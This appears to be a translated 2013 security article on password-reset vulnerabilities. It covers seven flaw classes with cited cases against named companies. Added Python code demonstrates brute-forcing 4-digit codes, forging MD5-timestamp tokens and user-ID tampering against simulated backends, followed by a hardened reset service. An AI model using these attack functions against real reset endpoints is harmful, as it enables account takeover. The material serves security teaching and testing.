Sleepy Dragon · 2013/07/17 23:51

0x00 Background


Where there are people, there are rivers and lakes, as the saying goes.

On the Internet, wherever there is user registration, there is also a password retrieval function.

And the password retrieval function can have vulnerabilities that many programmers never think of.

These vulnerabilities can often do very serious harm, such as account takeover.

This kind of vulnerability has appeared at a great many large Internet companies.

0x01 Detection Methods and Cases


WooYun cloud search keywords: password retrieval, password change, password reset.

I summarize the following 7 points; if there are others, please remind me so they can be added ~!

You can refer to these when testing your own company's projects.

There are several kinds of flaws in password retrieval:

1. The password retrieval credential is too weak. If only a four- or six-digit all-numeric code is needed to reset the password, it can be brute-forced: four digits is at most 10,000 guesses, six digits at most 1,000,000, which is nothing if the server does not limit attempts.

Case study:

WooYun: Dangdang arbitrary user password modification vulnerability

Here is another classic case where a restriction was circumvented:

WooYun: Vulnerability of user password modification

The number of submissions is limited, but there is a logic problem that lets you bypass the limit; click through to see how.

2. The password retrieval credential can be obtained directly from the client.

The credential is handed to the client. When retrieving the password, capture the traffic and inspect every URL response to see whether the final credential is present; if it is, the mobile phone or secure mailbox step can be bypassed entirely.

WooYun: Defect of arbitrary password modification of catwalk group

3. The password retrieval credential can be obtained directly from the page.

A classic case: the answer to the security question is found in the web page's source code……

WooYun: Reset the password of any sohu mailbox user

4. The password retrieval credential is relatively easy to guess.

The credential for retrieving the password was just the MD5 of a timestamp. A white hat spotted this and could easily retrieve any account's password: the attacker triggers the reset and knows roughly when, so the candidate tokens are the MD5 of each second around that moment.

WooYun: Password modification vulnerability of any qihoo 360 user

5. The password retrieval credential is not bound to a single user.

The credential is sent by email. The URL contains the user's information and the credential, but the credential is accepted for resetting any user, not only the one it was issued for.

WooYun: Identity pass arbitrary password modification – divulge large amounts of citizen information

6. The email address or mobile phone number used to retrieve the password can be changed.

This is really a logic problem in binding the secure phone: any user can bind a secure phone they control to any account, and after that reset anyone's password through it.

WooYun: Netease Email can directly change the passwords of other users

7. Logic error in the final password-change submission.

All the preceding logic is fine, so is there no problem?

A white hat found that the final reset request carries a user ID; change it to another user's ID, and that user's password is changed to the one you just set.

WooYun: Change the password of any Ctrip boss (celebrating WooYun's 100th vulnerability)
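The three credential flaws above (points 1, 4 and 7) in runnable form, as an added example that is not from the original post or from any of the WooYun reports: each class is a simulated reset backend with the flaw built in, and the function after it is the attack. The backends, the account names, the fixed 4-digit code, the request timestamp and the 300-second search window are all constructed assumptions for this demo.

```python
import hashlib
import secrets

# ---- Point 1: a 4-digit all-numeric code with no attempt limit ----
class ShortCodeReset:
    """Simulated reset backend (constructed for this demo) that proves identity
    with a 4-digit SMS-style code and never limits how many guesses it accepts."""

    def __init__(self, rng=secrets.randbelow):
        self.codes = {}
        self.attempts = 0
        self.rng = rng

    def request_reset(self, user):
        # The code is "sent" to the bound phone; it is not returned to the caller.
        self.codes[user] = f"{self.rng(10_000):04d}"

    def verify(self, user, code):
        self.attempts += 1              # counted, never limited: that is the flaw
        return self.codes.get(user) == code


def brute_force_code(server, user, digits=4):
    """At most 10**digits requests recover the code; 10,000 for four digits."""
    for n in range(10 ** digits):
        code = f"{n:0{digits}d}"
        if server.verify(user, code):
            return code
    return None


# ---- Point 4: the emailed credential is md5(request timestamp) ----
class TimestampTokenReset:
    """Simulated reset backend whose token is the MD5 of the request's unix time."""

    def __init__(self, clock):
        self.clock = clock
        self.tokens = {}

    def request_reset(self, user):
        self.tokens[user] = hashlib.md5(str(int(self.clock())).encode()).hexdigest()

    def reset(self, user, token, new_password):
        if self.tokens.get(user) != token:
            return False
        del self.tokens[user]
        return True


def forge_timestamp_token(server, user, guess_ts, window=300):
    """The attacker triggered the reset for the victim and knows roughly when, so
    md5(ts) for every second within +/- window is a small candidate set."""
    for ts in range(guess_ts - window, guess_ts + window + 1):
        candidate = hashlib.md5(str(ts).encode()).hexdigest()
        if server.reset(user, candidate, "pwned"):
            return ts
    return None


# ---- Point 7: the final submit trusts a user ID sent by the client ----
class FinalStepIdorReset:
    """Steps 1 and 2 are correct: a random code, bound to the right user and compared
    in constant time. The last request then updates whatever uid the client names."""

    def __init__(self):
        self.codes, self.passwords, self.verified = {}, {}, set()

    def request_reset(self, user):
        self.codes[user] = secrets.token_hex(16)
        return self.codes[user]         # stands in for the SMS/email channel

    def verify(self, user, code):
        if secrets.compare_digest(self.codes.get(user, ""), code):
            self.verified.add(user)     # session flag: this user passed step 2
            return True
        return False

    def submit_new_password(self, session_user, uid, new_password):
        if session_user not in self.verified:
            return False
        self.passwords[uid] = new_password   # BUG: should be self.passwords[session_user]
        return True


def demo():
    """Run each attack against its flawed backend and return what was recovered."""
    out = {}
    s1 = ShortCodeReset(rng=lambda n: 7321)           # fixed code so the run is repeatable
    s1.request_reset("victim")
    out["code"] = brute_force_code(s1, "victim")
    out["code_attempts"] = s1.attempts

    now = 1_373_993_460                                # constructed request time (unix seconds)
    s2 = TimestampTokenReset(clock=lambda: now + 37)   # server clock 37 s ahead of the guess
    s2.request_reset("victim")
    out["ts"] = forge_timestamp_token(s2, "victim", guess_ts=now)

    s3 = FinalStepIdorReset()
    code = s3.request_reset("attacker")                # attacker's own code, received legitimately
    s3.verify("attacker", code)
    s3.submit_new_password("attacker", uid="victim", new_password="pwned")
    out["victim_pw"] = s3.passwords.get("victim")
    return out
```

Running `demo()` recovers the 4-digit code in 7,322 requests, finds the timestamp token within the 601-second window even though the server clock was off from the guess, and ends with the victim's password set to "pwned" through the attacker's own, correctly verified session. Note that in the third backend the bug is only in the last line; everything a tester would look at first is fine.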

0x02 Remediation


Make the password retrieval credential complex and unguessable, but also watch the logic above: no step may act beyond the authority of the user who was actually verified (no overreach), and no important credential may appear where it does not belong, such as in an HTTP response or in page source.
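A reset flow that applies these rules, added here as an example and not code from the original post: the credential is 32 random bytes that never appear in the HTTP response (point 2), is stored only as a SHA-256 digest, expires, is single-use and is bound to the account it was issued for; the final step takes the account from the stored record, so there is no user ID in the request to tamper with (points 5 and 7); wrong tokens from one client are throttled (point 1); and rebinding the recovery email requires the current password (point 6). TOKEN_TTL, MAX_FAILS, the in-memory stores, the example accounts and the plaintext password field are assumptions of this demo, not from the post.

```python
import hashlib
import secrets
import time

TOKEN_TTL = 15 * 60   # seconds a reset link stays valid (assumed policy)
MAX_FAILS = 5         # wrong tokens from one client before it is cut off (assumed policy)


class PasswordResetService:
    """Hardened reset flow. Users and tokens live in dicts for the demo; a real
    service would keep them in a database and store a password hash, not plaintext."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.users = {}        # user_id -> {"email": str, "password": str}
        self.tokens = {}       # sha256(token) -> {"user", "exp", "used"}
        self.fails = {}        # client id (e.g. source IP) -> failed verifications

    def add_user(self, user_id, email, password):
        self.users[user_id] = {"email": email, "password": password}

    @staticmethod
    def _digest(raw):
        # Only the digest is stored, so a leaked table does not yield usable links.
        return hashlib.sha256(raw.encode()).hexdigest()

    def request_reset(self, email):
        """Returns (HTTP response body, what goes out by email). The response is the
        same whether or not the address exists, and never contains the token."""
        uid = next((u for u, r in self.users.items() if r["email"] == email), None)
        if uid is None:
            return {"status": "ok"}, None
        raw = secrets.token_urlsafe(32)                     # 256 bits of entropy
        self.tokens[self._digest(raw)] = {
            "user": uid, "exp": self.clock() + TOKEN_TTL, "used": False}
        return {"status": "ok"}, raw

    def reset_password(self, raw_token, new_password, client):
        """The request carries the token and the new password, nothing else:
        the account is whatever the token was issued for."""
        if self.fails.get(client, 0) >= MAX_FAILS:
            return "throttled"
        rec = self.tokens.get(self._digest(raw_token))
        if rec is None or rec["used"] or rec["exp"] < self.clock():
            self.fails[client] = self.fails.get(client, 0) + 1
            return "invalid"
        uid = rec["user"]
        for r in self.tokens.values():      # burn every outstanding token for the account
            if r["user"] == uid:
                r["used"] = True
        self.users[uid]["password"] = new_password
        return "ok"

    def change_email(self, session_user, current_password, new_email):
        """Rebinding the recovery address is itself a sensitive step: it re-authenticates
        and acts only on the session's own account, never on a client-supplied id."""
        if not secrets.compare_digest(self.users[session_user]["password"], current_password):
            return False
        self.users[session_user]["email"] = new_email
        return True


def demo():
    """Exercise the flow and return the observable outcomes of each check."""
    t = [1_000_000]                                    # controllable clock for the demo
    svc = PasswordResetService(clock=lambda: t[0])
    svc.add_user("victim", "victim@example.com", "hunter2")
    svc.add_user("attacker", "mallory@example.com", "letmein")
    out = {}
    resp, tok = svc.request_reset("victim@example.com")
    out["response_leaks_token"] = tok is not None and tok in str(resp)
    # An attacker's own token can only ever change the attacker's own password.
    _, atk_tok = svc.request_reset("mallory@example.com")
    svc.reset_password(atk_tok, "pwned", client="10.0.0.9")
    out["victim_pw_after_attacker"] = svc.users["victim"]["password"]
    out["attacker_pw"] = svc.users["attacker"]["password"]
    # The legitimate token works exactly once.
    out["first"] = svc.reset_password(tok, "new-pass", client="10.0.0.1")
    out["replay"] = svc.reset_password(tok, "again", client="10.0.0.1")
    # A token past its TTL is dead even if unused.
    _, tok2 = svc.request_reset("victim@example.com")
    t[0] += TOKEN_TTL + 1
    out["expired"] = svc.reset_password(tok2, "x", client="10.0.0.1")
    # Guessing from one client stops being answered after MAX_FAILS wrong tokens.
    for _ in range(MAX_FAILS):
        svc.reset_password("not-a-token", "x", client="10.0.0.66")
    out["throttled"] = svc.reset_password("not-a-token", "x", client="10.0.0.66")
    out["email_change_without_password"] = svc.change_email("victim", "wrong", "evil@example.com")
    return out
```

The throttle here is keyed by client and the token by account; in production you would rate-limit `request_reset` per account as well, so that an attacker cannot flood a victim's inbox or keep a fresh token in flight indefinitely.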